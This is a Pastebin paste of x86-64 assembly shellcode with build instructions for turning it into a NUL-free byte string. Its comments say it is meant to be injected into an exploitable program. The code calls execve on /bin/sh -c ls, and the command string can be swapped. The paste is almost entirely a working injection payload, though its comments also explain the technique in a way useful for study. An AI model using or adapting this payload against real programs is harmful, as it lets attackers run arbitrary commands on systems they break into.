Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # This shell code program could be converted to a C style string using:
- #
- # as --64 shellcode.s -o shellcode.o
- # ld shellcode.o -o shellcode
- # objcopy -j.text -O binary shellcode shellcode.bin
- # hexdump -v -e '"\\""x" 1/1 "%02x" ""' shellcode.bin
- # This shell code program can't be run directly but it will operate as shellcode
- # once converted to a string and injected into an exploitable program. This code
- # is designed to avoid any NUL(0x00) byte characters being generated.
- .section .text
- .globl _start
- _start:
- jmp overdata # Mix code and DATA in same segment
- # Generate all the strings without a NUL(0) byte. We will replace the 0xff with 0x00 in the code
- name:.ascii "/bin/sh" # Program to run
- name_nul: .byte 0xff # This 0xff will be replaced by 0x00 in the code
- arg1:.ascii "-c" # Program argument
- arg1_nul: .byte 0xff # This 0xff will be replaced by 0x00 in the code
- arg2:.ascii "ls" # Program Argument
- arg2_nul: .byte 0xff # This 0xff will be replaced by 0x00 in the code
- overdata:
- xor %eax, %eax # RAX = 0
- # All references to the data before our code will use a negative offset from RIP
- # and use a 1 byte displacement. This avoids producing unwanted NUL(0) characters in the
- # code. We use RIP relative addressing so the codewill be position independent
- # once loaded in memory.
- # Zero terminate each of the strings
- mov %al, arg2_nul(%rip)
- mov %al, arg1_nul(%rip)
- mov %al, name_nul(%rip)
- lea name(%rip), %rdi # RDI = pointer to program name string
- push %rax # NULL terminate the program argument array
- leaq arg2(%rip), %rsi
- push %rsi # Push the address of the 3rd program argument on stack
- lea arg1(%rip), %rsi
- push %rsi # Push the address of the 2nd program argument on stack
- push %rdi # Push the address of the program name on stack as 1st argument
- mov %rsp, %rsi # RSI = Pointer to the program argument array
- mov %rax, %rdx # RDX = 0 = NULL envp parameter
- mov $59, %al # RAX = execve system call number
- syscall
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement